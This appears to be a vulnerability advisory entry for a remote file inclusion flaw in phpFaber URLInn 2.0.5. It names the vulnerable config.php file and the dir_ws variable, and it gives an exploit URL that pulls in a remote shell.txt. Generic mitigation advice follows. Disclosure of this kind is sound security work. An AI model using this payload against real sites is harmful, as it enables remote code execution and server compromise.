vendor:
phpFaber.URLInn.v2.0.5.PHP.NULL-DGT
by:
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: phpFaber.URLInn.v2.0.5.PHP.NULL-DGT
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Remote File Inclusion in phpFaber.URLInn.v2.0.5.PHP.NULL-DGT
This vulnerability allows an attacker to include remote files in the vulnerable file /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php. The exploit URL is http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?. The vulnerability occurs due to the presence of the vulnerable variable dir_ws in the code at line number 78.
Mitigation:
To mitigate this vulnerability, it is recommended to properly sanitize and validate user input before using it in file inclusion operations. Additionally, disabling the register_globals feature and keeping software up to date can help prevent such vulnerabilities.